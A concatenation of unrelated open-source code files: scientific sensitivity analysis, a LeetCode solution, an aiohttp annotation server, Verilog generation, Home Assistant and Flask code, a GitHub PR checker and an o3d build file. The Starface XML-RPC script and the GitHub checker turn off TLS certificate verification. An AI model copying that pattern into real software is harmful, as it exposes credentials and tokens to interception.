S['dgsm'][j], S['dgsm_conf'][j] = calc_dgsm(base, perturbed[:, j], X_perturbed[
:, j] - X_base[:, j], problem['bounds'][j], num_resamples, conf_level)
if print_to_console:
print("%s %f %f %f %f" % (
problem['names'][j], S['vi'][j], S['vi_std'][j], S['dgsm'][j], S['dgsm_conf'][j]))
return S
def calc_vi(base, perturbed, x_delta):
# v_i sensitivity measure following Sobol and Kucherenko (2009)
# For comparison, Morris mu* < sqrt(v_i)
dfdx = (perturbed - base) / x_delta
dfdx2 = dfdx ** 2
return np.mean(dfdx2), np.std(dfdx2)
def calc_dgsm(base, perturbed, x_delta, bounds, num_resamples, conf_level):
# v_i sensitivity measure following Sobol and Kucherenko (2009)
# For comparison, total order S_tot <= dgsm
D = np.var(base)
vi, _ = calc_vi(base, perturbed, x_delta)
dgsm = vi * (bounds[1] - bounds[0]) ** 2 / (D * np.pi ** 2)
s = np.zeros(num_resamples)
for i in range(num_resamples):
r = np.random.randint(len(base), size=len(base))
s[i], _ = calc_vi(base[r], perturbed[r], x_delta[r])
return dgsm, norm.ppf(0.5 + conf_level / 2) * s.std(ddof=1)
if __name__ == "__main__":
parser = common_args.create()
parser.add_argument('-X', '--model-input-file', type=str,
required=True, default=None, help='Model input file')
parser.add_argument('-r', '--resamples', type=int, required=False, default=1000,
help='Number of bootstrap resamples for Sobol confidence intervals')
args = parser.parse_args()
problem = read_param_file(args.paramfile)
Y = np.loadtxt(args.model_output_file, delimiter=args.delimiter, usecols=(args.column,))
X = np.loadtxt(args.model_input_file, delimiter=args.delimiter, ndmin=2)
if len(X.shape) == 1:
X = X.reshape((len(X), 1))
analyze(problem, X, Y, num_resamples=args.resamples, print_to_console=True)
|
'''
144. Binary Tree Preorder Traversal Easy
Given the root of a binary tree, return the preorder traversal of its nodes' values.
Example 1:
Input: root = [1,null,2,3]
Output: [1,2,3]
Example 2:
Input: root = []
Output: []
Example 3:
Input: root = [1]
Output: [1]
Example 4:
Input: root = [1,2]
Output: [1,2]
Example 5:
Input: root = [1,null,2]
Output: [1,2]
Constraints:
The number of nodes in the tree is in the range [0, 100].
-100 <= Node.val <= 100
'''# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
self.ans = []
#self.recursive(root)
self.iterative(root)
return self.ans
def recursive(self, node):
if not node:
return
self.ans.append(node.val)
self.recursive(node.left)
self.recursive(node.right)
def iterative(self, root):
stack = [(root, False)]
while(len(stack)>0):
node, visted = stack.pop()
if node:
if visted:
self.ans.append(node.val)
else:
# Note: Right leaf first due to using a stack
# Preorder, Root, left, right
stack.append((node.right, False))
stack.append((node.left, False))
stack.append((node, True))
|
# -*- coding: utf-8 -*-
import aiohttp
from aiohttp import web
import argparse
import asyncio
import concurrent.futures
import io
import os
from .data import Data
# Local resources
HERE = os.path.dirname(os.path.realpath(__file__))
INDEX_HTML = os.path.join(HERE, 'index.html')
D3_JS = os.path.join(HERE, 'd3.v4.min.js')
# Handler factory for static files
def static_handler(path):
async def handler(request):
return web.FileResponse(path)
return handler
# Acquire sample
async def get_api_annotation(request):
data = request.app['data']
payload = await data.get_next_sample()
return web.json_response(payload)
# Save annotation result
async def post_api_annotation(request):
data = request.app['data']
payload = await request.json()
result = await data.add_annotation(payload)
return web.json_response(result)
# Run service
def run(host, port, metadata_path, image_folder, annotation_path):
with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
# Create application
app = web.Application()
app.add_routes([
web.get('/', static_handler(INDEX_HTML)),
web.get('/d3.v4.min.js', static_handler(D3_JS)),
web.get('/api/annotation', get_api_annotation),
web.post('/api/annotation', post_api_annotation)
])
app['executor'] = executor
app['data'] = Data(metadata_path, image_folder, annotation_path, executor)
app['annotation_path'] = annotation_path
# Start server
runner = web.AppRunner(app)
loop = asyncio.get_event_loop()
async def start():
await runner.setup()
site = web.TCPSite(runner, host, port)
await site.start()
loop.run_until_complete(start())
print(f'Running on {host}:{port}')
# Run forever (hack to avoid blocking select on Windows with default loop)
async def foo():
while True:
await asyncio.sleep(1.0)
try:
loop.run_until_complete(foo())
except KeyboardInterrupt:
pass
# Cleanup
loop.run_until_complete(runner.cleanup())
# Standalone usage
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Box annotator service')
parser.add_argument('-H', '--host', nargs='?', default='0.0.0.0', help='Host address bound')
parser.add_argument('-P', '--port', nargs='?', type=int, default=80, help='Port used')
parser.add_argument('-M', '--metadata', nargs='?', default='./metadata.json', help='Metadata file')
parser.add_argument('-I', '--images', nargs='?', default='./images/', help='Image folder')
parser.add_argument('-A', '--annotation', nargs='?', default='./annotation.json', help='Annotation file')
args = parser.parse_args()
run(args.host, args.port, args.metadata, args.images, args.annotation)
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen.core.vtypes as vtypes
import veriloggen.core.module as module
def mkMultiplierCore(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
if lwidth <= 0:
raise ValueError("data width must be greater than 0.")
if rwidth <= 0:
raise ValueError("data width must be greater than 0.")
if depth < 2:
raise ValueError("depth must be greater than 1.")
retwidth = lwidth + rwidth
m = module.Module('multiplier_core_%d' % index)
clk = m.Input('CLK')
update = m.Input('update')
a = m.Input('a', lwidth)
b = m.Input('b', rwidth)
c = m.Output('c', retwidth)
_a = m.Reg('_a', lwidth, signed=lsigned)
_b = m.Reg('_b', rwidth, signed=rsigned)
_mul = m.Wire('_mul', retwidth, signed=True)
_pipe_mul = [m.Reg('_pipe_mul%d' % i, retwidth, signed=True)
for i in range(depth - 1)]
__a = _a
__b = _b
if not lsigned:
__a = vtypes.SystemTask(
'signed', vtypes.Cat(vtypes.Int(0, width=1), _a))
if not rsigned:
__b = vtypes.SystemTask(
'signed', vtypes.Cat(vtypes.Int(0, width=1), _b))
m.Assign(_mul(__a * __b))
m.Assign(c(_pipe_mul[depth - 2]))
m.Always(vtypes.Posedge(clk))(
vtypes.If(update)(
_a(a),
_b(b),
_pipe_mul[0](_mul),
[_pipe_mul[i](_pipe_mul[i - 1]) for i in range(1, depth - 1)]
))
return m
def mkMultiplier(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
if lwidth <= 0:
raise ValueError("data width must be greater than 0.")
if rwidth <= 0:
raise ValueError("data width must be greater than 0.")
if depth < 2:
raise ValueError("depth must be greater than 1.")
retwidth = lwidth + rwidth
mult = mkMultiplierCore(index, lwidth, rwidth, lsigned, rsigned, depth)
m = module.Module('multiplier_%d' % index)
clk = m.Input('CLK')
rst = m.Input('RST')
update = m.Input('update')
enable = m.Input('enable')
valid = m.Output('valid')
a = m.Input('a', lwidth)
b = m.Input('b', rwidth)
c = m.Output('c', retwidth)
valid_reg = [m.Reg('valid_reg%d' % i) for i in range(depth)]
m.Assign(valid(valid_reg[depth - 1]))
m.Always(vtypes.Posedge(clk))(
vtypes.If(rst)(
[valid_reg[i](0) for i in range(depth)]
).Else(
vtypes.If(update)(
valid_reg[0](enable),
[valid_reg[i](valid_reg[i - 1]) for i in range(1, depth)]
)
))
ports = [('CLK', clk), ('update', update), ('a', a), ('b', b), ('c', c)]
m.Instance(mult, 'mult', ports=ports)
return m
# global multiplier count
index_count = 0
def get_mul(lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
global index_count
mul = mkMultiplier(index_count, lwidth, rwidth, lsigned, rsigned, depth)
index_count += 1
return mul
def reset():
global index_count
index_count = 0
|
#!/usr/bin/python
import wgdata
from wvtest import wvtest
@wvtest.wvtest
def EaterTest():
e = wgdata.Eater('abcdefg')
wvtest.WVPASSEQ(e.Eat(2), 'ab')
wvtest.WVEXCEPT(wgdata.DecodeError, e.Eat, 10)
wvtest.WVPASSEQ(e.Unpack('!3s'), ('cde',))
wvtest.WVPASSEQ(e.Remainder(), 'fg')
wvtest.WVPASSEQ(e.Remainder(), '')
e = wgdata.Eater('\x01\x02\x03\x04\x05\x06')
wvtest.WVPASSEQ(list(e.Iter('!H', 4)), [(0x0102,), (0x0304,)])
wvtest.WVPASSEQ(list(e.Iter('!B', 1)), [(0x05,)])
wvtest.WVEXCEPT(wgdata.DecodeError, lambda: list(e.Iter('!B', 2)))
wvtest.WVPASSEQ(e.Remainder(), '\x06')
if __name__ == '__main__':
wvtest.wvtest_main()
|
import hashlib
import os
import logging
import sys
import xmlrpclib
import ssl
class StarfaceConfig():
def __init__(self, file):
self.file = file
self.__items = ['url', 'user', 'password', 'preferred_device']
self.url = None
self.user = None
self.password = None
self.preferred_device = None
self.__load(self.file)
def __load(self, file):
with open(file, 'r') as f:
for item in self.__items:
setattr(self, item, f.readline().rstrip())
index = 0
for item in self.__items[:-1]:
index+=1
if not getattr(self, item):
raise RuntimeError('Config item "{0}" missing (line number {1})'.format(item, index))
class StarfaceCaller():
def __init__(self, url, user, password):
self.url = url
self.user = user
self.password = password
self.proxy = xmlrpclib.ServerProxy(self.uri, verbose=False, use_datetime=True,
context=ssl._create_unverified_context())
@property
def uri(self):
return '{0}/xml-rpc?de.vertico.starface.auth={1}'.format(self.url, self.auth)
@property
def auth(self):
password = hashlib.sha512()
password.update(self.password)
auth = hashlib.sha512()
auth.update(self.user)
auth.update('*')
auth.update(password.hexdigest().lower())
return '{0}:{1}'.format(self.user, auth.hexdigest())
def get_version(self):
return self.proxy.ucp.v30.requests.system.getServerVersion()
def place_call(self, number, preferred_device=''):
login = self.proxy.ucp.v20.server.connection.login()
if login:
self.proxy.ucp.v20.server.communication.call.placeCall(number, preferred_device, '')
self.proxy.ucp.v20.server.connection.logout()
else:
raise RuntimeError('Could not call login on starface')
def main():
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
import argparse
name = os.path.basename(sys.argv[0])
parser = argparse.ArgumentParser(prog=name,
usage='%(prog)s -n +49911777-777 [ -d SIP/dev ] [ -h ]')
parser.add_argument('-n', '--number', dest='number', help='Call number')
parser.add_argument('-d', '--device', dest='device', help='Place call on device, e.g. SIP/mydevice')
parser.add_argument('-c', '--credential', dest='credential', help='Credential file',
default='~/.starface_credentials')
args = parser.parse_args()
if not args.number:
print('{0}: No argument "number" given'.format(name))
parser.print_usage()
return 1
credential = os.path.expanduser(args.credential)
logger.debug('Using credential file %s', credential)
config = StarfaceConfig(credential)
caller = StarfaceCaller(url=config.url, user=config.user, password=config.password)
logger.debug('Starface Version: %s', caller.get_version())
preferred_device = ''
if args.device:
preferred_device = args.device
elif config.preferred_device:
preferred_device = config.preferred_device
caller.place_call(args.number, preferred_device)
return 0;
if __name__ == '__main__':
sys.exit(main())
|
"""Support for Freedompro cover."""
import json
from pyfreedompro import put_state
from homeassistant.components.cover import (
ATTR_POSITION,
CoverDeviceClass,
CoverEntity,
CoverEntityFeature,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import DOMAIN
DEVICE_CLASS_MAP = {
"windowCovering": CoverDeviceClass.BLIND,
"gate": CoverDeviceClass.GATE,
"garageDoor": CoverDeviceClass.GARAGE,
"door": CoverDeviceClass.DOOR,
"window": CoverDeviceClass.WINDOW,
}
SUPPORTED_SENSORS = {"windowCovering", "gate", "garageDoor", "door", "window"}
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up Freedompro cover."""
api_key = entry.data[CONF_API_KEY]
coordinator = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
Device(hass, api_key, device, coordinator)
for device in coordinator.data
if device["type"] in SUPPORTED_SENSORS
)
class Device(CoordinatorEntity, CoverEntity):
"""Representation of an Freedompro cover."""
def __init__(self, hass, api_key, device, coordinator):
"""Initialize the Freedompro cover."""
super().__init__(coordinator)
self._session = aiohttp_client.async_get_clientsession(hass)
self._api_key = api_key
self._attr_name = device["name"]
self._attr_unique_id = device["uid"]
self._attr_device_info = DeviceInfo(
identifiers={
(DOMAIN, self.unique_id),
},
manufacturer="Freedompro",
model=device["type"],
name=self.name,
)
self._attr_current_cover_position = 0
self._attr_is_closed = True
self._attr_supported_features = (
CoverEntityFeature.CLOSE
| CoverEntityFeature.OPEN
| CoverEntityFeature.SET_POSITION
)
self._attr_device_class = DEVICE_CLASS_MAP[device["type"]]
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
device = next(
(
device
for device in self.coordinator.data
if device["uid"] == self.unique_id
),
None,
)
if device is not None and "state" in device:
state = device["state"]
if "position" in state:
self._attr_current_cover_position = state["position"]
if self._attr_current_cover_position == 0:
self._attr_is_closed = True
else:
self._attr_is_closed = False
super()._handle_coordinator_update()
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self._handle_coordinator_update()
async def async_open_cover(self, **kwargs):
"""Open the cover."""
await self.async_set_cover_position(position=100)
async def async_close_cover(self, **kwargs):
"""Close the cover."""
await self.async_set_cover_position(position=0)
async def async_set_cover_position(self, **kwargs):
"""Async function to set position to cover."""
payload = {}
payload["position"] = kwargs[ATTR_POSITION]
payload = json.dumps(payload)
await put_state(
self._session,
self._api_key,
self.unique_id,
payload,
)
await self.coordinator.async_request_refresh()
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms import validators
class UserSignupForm(FlaskForm):
username = StringField('username', default="username *", validators=[validators.DataRequired()])
email = StringField("email", default="your@email.com *", validators=[validators.Email(message="Please enter a valid email")])
password = StringField('password', default="password *", validators=[validators.DataRequired()])
password_confirm = StringField('confirm', default="confirm *", validators=[validators.DataRequired()])
class UserLoginForm(FlaskForm):
username = StringField('username', validators=[validators.DataRequired()])
password = StringField('password', validators=[validators.DataRequired()])
class UserForm(FlaskForm):
username = StringField('username', validators=[validators.DataRequired()])
email = StringField("email", validators=[validators.Email(message="Please enter a valid email")])
image_url = StringField('avatar (URL)', [validators.Length(validators.DataRequired())])
|
#!/usr/bin/env python3
import argparse
import os
import sys
import re
import json
import base64
import urllib3
from github import Github
from github.PullRequest import PullRequest
from github.Repository import Repository
from github.ContentFile import ContentFile
from github.Branch import Branch
from utils import load_json, CONTENT_ROOT_PATH, timestamped_print
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print = timestamped_print
METADATA = 'pack_metadata.json'
PACKS = 'Packs'
SUPPORT = 'support'
XSOAR_SUPPORT = 'xsoar'
PACK_NAME_REGEX = re.compile(r'Packs/([A-Za-z0-9-_.]+)/')
def get_metadata_filename_from_pr(pr_files, pack_name) -> str:
""" Iterates over all pr files and return the pr metadata.json filename if exists, else None
Args:
pr_files (PaginatedList[File]): The list of pr files
pack_name (str): The pack name
Returns:
The pr metadata.json filename if exists, else None
"""
pack_metadata_path = os.path.join(PACKS, pack_name, METADATA)
print(f'Searching for a {pack_metadata_path} file in the PR.')
for file in pr_files:
if pack_metadata_path in file.filename:
print(f'Found {METADATA} file in PR for pack {pack_name}: {file.filename}.')
return file.filename
print(f'Did not find a {pack_metadata_path} file in the PR.')
return ''
def get_pack_support_type_from_pr_metadata_file(pr_metadata_filename: str, pr: PullRequest):
""" Retrieves the support type from the pr metadata.json file
Args:
pr_metadata_filename: The pr metadata.json filename
pr: The pr
Returns:
The support type
"""
print(f'Getting support type from {pr_metadata_filename}.')
_, branch_name = pr.head.label.split(':')
print(f'Branch name is: {branch_name}')
contributor_repo: Repository = pr.head.repo
branch: Branch = contributor_repo.get_branch(branch=branch_name)
metadata_file: ContentFile = contributor_repo.get_contents(path=pr_metadata_filename, ref=branch.commit.sha)
metadata_file_content: dict = json.loads(base64.b64decode(metadata_file.content))
return metadata_file_content.get(SUPPORT)
def get_pack_names_from_pr(pr_files) -> set:
""" Extracts the pack names from the pr files
Args:
pr_files (PaginatedList[File]): The list of pr files
Returns:
The set of pack names
"""
pack_names = set()
for file in pr_files:
if PACKS in file.filename:
pack_names.add(re.findall(PACK_NAME_REGEX, file.filename)[0])
if not pack_names:
raise Exception('PR does not contains files prefixed with "Packs".')
return pack_names
def get_pack_support_type_from_repo_metadata_file(pack_name):
""" Retrieves the support type from the repo metadata.json file
Args:
pack_name (str): The pack name
Returns:
The support type
"""
print('Getting support type from the repo.')
repo_pack_metadata_path: str = os.path.join(CONTENT_ROOT_PATH, PACKS, pack_name, METADATA)
print(f'{pack_name} pack {METADATA} file is at path: {repo_pack_metadata_path}')
repo_pack_metadata: dict = load_json(repo_pack_metadata_path)
return repo_pack_metadata.get(SUPPORT)
def arguments_handler():
""" Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description='Check if the contribution form needs to be filled.')
parser.add_argument('-p', '--pr_number', help='The PR number to check if the contribution form needs to be filled.')
parser.add_argument('-g', '--github_token', help='The GitHub token to authenticate the GitHub client.')
return parser.parse_args()
def main():
options = arguments_handler()
pr_number = options.pr_number
github_token = options.github_token
org_name: str = 'demisto'
repo_name: str = 'content'
exit_status = 0
packs_without_metadata_or_support = set()
not_filled_packs = set()
github_client: Github = Github(github_token, verify=False)
content_repo: Repository = github_client.get_repo(f'{org_name}/{repo_name}')
pr: PullRequest = content_repo.get_pull(int(pr_number))
pr_files = pr.get_files()
for pack_name in get_pack_names_from_pr(pr_files):
if pr_metadata_filename := get_metadata_filename_from_pr(pr_files, pack_name):
support_type = get_pack_support_type_from_pr_metadata_file(pr_metadata_filename, pr)
else:
support_type = get_pack_support_type_from_repo_metadata_file(pack_name)
if not support_type:
packs_without_metadata_or_support.add(pack_name)
exit_status = 1
elif support_type == XSOAR_SUPPORT:
print(f'\n{pack_name} pack is XSOAR supported. Contribution form should not be filled for XSOAR supported '
f'contributions.')
else:
not_filled_packs.add(pack_name)
print(f'{pack_name} pack is {support_type} supported.')
exit_status = 1
if packs_without_metadata_or_support:
print(f'ERROR: {METADATA} file / pack support is missing for the following packs: '
f'{packs_without_metadata_or_support}')
if not_filled_packs:
print(f'\nERROR: Contribution form was not filled for PR: {pr_number}.\nMake sure to register your contribution'
f' by filling the contribution registration form in - https://forms.gle/XDfxU4E61ZwEESSMA')
sys.exit(exit_status)
if __name__ == "__main__":
main()
|
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'wixdir': 'third_party\\wix_2_0_4221\\files',
'dx_redist_path': '../../../o3d-internal/third_party/dx_nov_2007_redist',
'dx_redist_exists': '<!(python ../../build/file_exists.py ../../../o3d-internal/third_party/dx_nov_2007_redist/d3dx9_36.dll)',
'guidgen': '..\\..\\nbguidgen\\win\\nbguidgen.exe',
'nppversion': '<!(python ../../plugin/version_info.py --commaversion)',
'dotnppversion': '<!(python ../../plugin/version_info.py --version)',
# Unique guid for o3d namespace
'o3d_namespace_guid': 'B445DBAE-F5F9-435A-9A9B-088261CDF00A',
# Changing the following values would break upgrade paths, so we
# hard-code the values instead of generating them.
'bad_old_o3d_upgrade_code': 'dc819ed6-4155-3cff-b580-45626aed5848',
'o3d_extras_google_update_guid': '{34B2805D-C72C-4f81-AED5-5A22D1E092F1}',
'o3d_extras_upgrade_code': 'c271f2f0-c7ad-3bc9-8216-211436aa2244',
'o3d_npp_google_update_guid': '{70308795-045C-42da-8F4E-D452381A7459}',
'o3d_npp_upgrade_code': '0f098121-2876-3c23-bd4c-501220ecbb42',
# We don't actually want the extras version to update by itself;
# it should change only when we actually add something to the
# installer or change the d3dx9 version. This version is
# therefore independent of the o3d plugin and sdk versions.
'extrasversion': '0,1,1,0',
'dotextrasversion': '0.1.1.0',
# Registry paths for Google Update
'google_update_reg_path': 'Software\\Google\\Update\\Clients\\',
'google_update_state_reg_path': 'Software\\Google\\Update\\ClientState\\',
},
'includes': [
'../../build/common.gypi',
],
'targets': [
{
'target_name': 'cactions',
'type': 'shared_library',
'sources': [
'custom_actions.cc',
],
'dependencies': [
'../../../base/base.gyp:base',
'../../build/libs.gyp:cg_libs',
'../../build/libs.gyp:gl_libs',
'../../plugin/plugin.gyp:o3dPluginLogging',
'../../statsreport/statsreport.gyp:o3dStatsReport',
],
'include_dirs': [
'../..',
'../../..',
'../../<(glewdir)/include',
'../../<(cgdir)/include',
'<(INTERMEDIATE_DIR)',
'$(DXSDK_DIR)/Include',
],
'defines': [
'NOMINMAX',
'WIN32',
'WIN32_LEAN_AND_MEAN',
'_ATL_SECURE_NO_WARNINGS',
'_CRT_SECURE_NO_DEPRECATE',
'_UNICODE', # turn on unicode
'_WIN32_WINNT=0x0600',
'_WINDOWS',
],
'libraries': [
'-ladvapi32.lib',
'"$(DXSDK_DIR)/Lib/x86/dxguid.lib"',
'-lmsi.lib',
'-lole32.lib',
'-loleaut32.lib',
'-lshell32.lib',
'-lshlwapi.lib',
'-luser32.lib',
],
# Disable the #pragma deprecated warning because
# ATL seems to use deprecated CRT libs.
'msvs_disabled_warnings': [4995],
'msvs_configuration_attributes': {
'UseOfATL': '1', # 1 = static link to ATL, 2 = dynamic link
},
},
{
'target_name': 'installer',
'type': 'none',
'variables': {
'candle_exe': '../../../<(wixdir)/candle.exe',
'light_exe': '../../../<(wixdir)/light.exe',
'custom_actions_path': '<(PRODUCT_DIR)/cactions.dll',
'd3dx_guid': '<!(<(guidgen) <(o3d_namespace_guid) d3dx-<(nppversion))',
'dbl_path': '../../installer/win/driver_blacklist.txt',
'dx_redist_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'dx_redist-<(nppversion))',
'get_extras_path': '<(PRODUCT_DIR)/getextras.exe',
'ieplugin_path': '<(PRODUCT_DIR)/o3d_host.dll',
'include_software_renderer':
'<!(python ../../build/file_exists.py '
'../../../<(swiftshaderdir)/swiftshader_d3d9.dll)',
'npplugin_path': '<(PRODUCT_DIR)/npo3dautoplugin.dll',
'o3d_driver_blacklist_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_driver_blacklist-<(nppversion))',
'o3d_get_extras_guid':
'<!(<(guidgen) <(o3d_namespace_guid) extras_installer-)',
'o3d_iep_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_ieplugin_component-<(nppversion))',
'o3d_npp_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_npplugin_component-<(nppversion))',
'o3d_npp_google_update_reg_component_guid':
'<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_user_google_update_reg_component-<(nppversion))',
'o3d_npp_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_package-<(nppversion))',
'o3d_npp_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_product-<(nppversion))',
'o3d_npp_reg_key':
'<(google_update_reg_path)<(o3d_npp_google_update_guid)',
'o3d_npp_state_reg_key':
'<(google_update_state_reg_path)<(o3d_npp_google_update_guid)',
'o3d_reporter_guid':
'<!(<(guidgen) <(o3d_namespace_guid) o3d_reporter-<(nppversion))',
'o3d_software_renderer_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_software_renderer-<(nppversion))',
'rep_path': '<(PRODUCT_DIR)/reporter.exe',
'software_renderer_path':
'../../../<(swiftshaderdir)/swiftshader_d3d9.dll',
},
'dependencies': [
'../../converter/converter.gyp:o3dConverter',
'../../breakpad/breakpad.gyp:reporter',
'../../google_update/google_update.gyp:getextras',
'../../documentation/documentation.gyp:*',
'../../plugin/plugin.gyp:npo3dautoplugin',
'../../plugin/plugin.gyp:o3d_host',
'../../samples/samples.gyp:samples',
'../../build/libs.gyp:cg_libs',
'../../build/libs.gyp:gl_libs',
'cactions',
],
'rules': [
{
'rule_name': 'candle',
'extension': 'wxs',
'process_outputs_as_sources': 1,
'inputs': [
'<(candle_exe)',
'../../installer/win/docs.url',
'<(PRODUCT_DIR)/cactions.dll',
'<(PRODUCT_DIR)/cg.dll',
'<(PRODUCT_DIR)/cgGL.dll',
'<(PRODUCT_DIR)/cgc.exe',
'<(PRODUCT_DIR)/o3dConditioner.exe',
'<(dbl_path)',
'<(get_extras_path)',
'<(ieplugin_path)',
'<(npplugin_path)',
'<(rep_path)',
],
'outputs': [
'<(RULE_INPUT_ROOT).wixobj',
],
'action': [
'<(candle_exe)',
'-nologo',
'-dCustomActionsPath=<(custom_actions_path)',
'-dD3DXGuid=<(d3dx_guid)',
'-dDBLGuid=<(o3d_driver_blacklist_guid)',
'-dDBLPath=<(dbl_path)',
'-dDeprecatedUpgradeCode=<(bad_old_o3d_upgrade_code)',
'-dGetExtrasGuid=<(o3d_get_extras_guid)',
'-dGetExtrasPath=<(get_extras_path)',
'-dIEPluginPath=<(ieplugin_path)',
'-dIepComponentGuid=<(o3d_iep_component_guid)',
'-dIncludeSoftwareRenderer=include_software_renderer',
'-dNPPluginPath=<(npplugin_path)',
'-dNppComponentGuid=<(o3d_npp_component_guid)',
'-dNppGoogleUpdateRegGuid=<(o3d_npp_google_update_reg_component_guid)',
'-dNppGoogleUpdateRegKey=<(o3d_npp_reg_key)',
'-dNppGoogleUpdateStateRegKey=<(o3d_npp_state_reg_key)',
'-dNppPackageGuid=<(o3d_npp_package_guid)',
'-dNppProductGuid=<(o3d_npp_product_guid)',
'-dNppUpgradeCode=<(o3d_npp_upgrade_code)',
'-dNppVersion=<(dotnppversion)',
'-dRepGuid=<(o3d_reporter_guid)',
'-dRepPath=<(rep_path)',
'-dSoftwareRendererGuid=<(o3d_software_renderer_guid)',
'-dSoftwareRendererPath=<(software_renderer_path)',
'-o',
'<(RULE_INPUT_ROOT).wixobj',
'<(RULE_INPUT_PATH)',
],
'message': 'Generating installer from <(RULE_INPUT_PATH)',
},
{
'rule_name': 'light',
'extension': 'wixobj',
'process_outputs_as_sources': 1,
'inputs': [
'<(light_exe)',
],
'outputs': [
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
],
'action': [
'<(light_exe)',
'-nologo',
'-out',
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
'<(RULE_INPUT_PATH)',
],
'message': 'Linking installer from <(RULE_INPUT_PATH)',
},
],
'sources': [
'o3d.wxs',
],
},
],
'conditions': [
['"<(dx_redist_exists)" == "True"',
{
'targets': [
{
'target_name': 'extras_installer',
'type': 'none',
'variables': {
'candle_exe': '../../../<(wixdir)/candle.exe',
'light_exe': '../../../<(wixdir)/light.exe',
'o3d_extras_d3dx_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_d3dx_component-<(nppversion))',
'o3d_extras_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_package-<(extrasversion))',
'o3d_extras_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_product-<(extrasversion))',
'o3d_extras_reg_key':
'<(google_update_reg_path)<(o3d_extras_google_update_guid)',
},
'rules': [
{
'rule_name': 'candle',
'extension': 'wxs',
'process_outputs_as_sources': 1,
'inputs': [
'<(candle_exe)',
],
'outputs': [
'<(RULE_INPUT_ROOT).wixobj',
],
'action': [
'<(candle_exe)',
'-nologo',
'-dDxRedistPath=<(dx_redist_path)',
'-dExtrasD3DXComponentGuid=<(o3d_extras_d3dx_component_guid)',
'-dExtrasGoogleUpdateRegGuid=<(o3d_extras_google_update_guid)',
'-dExtrasGoogleUpdateRegKey=<(o3d_extras_reg_key)',
'-dExtrasPackageGuid=<(o3d_extras_package_guid)',
'-dExtrasProductGuid=<(o3d_extras_product_guid)',
'-dExtrasUpgradeCode=<(o3d_extras_upgrade_code)',
'-dExtrasVersion=<(dotextrasversion)',
'-o',
'<(RULE_INPUT_ROOT).wixobj',
'<(RULE_INPUT_PATH)',
],
'message': 'Generating extras installer from <(RULE_INPUT_PATH)',
},
{
'rule_name': 'light',
'extension': 'wixobj',
'process_outputs_as_sources': 1,
'inputs': [
'<(light_exe)',
],
'outputs': [
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
],
'action': [
'<(light_exe)',
'-nologo',
'-out',
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
'<(RULE_INPUT_PATH)',
],
'message': 'Linking extras installer from <(RULE_INPUT_PATH)',
},
],
'sources': [
'o3dextras.wxs',
],
},
],
},
{
'targets': [
{
'target_name': 'extras_installer',
'type': 'none',
},
],
},
],
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.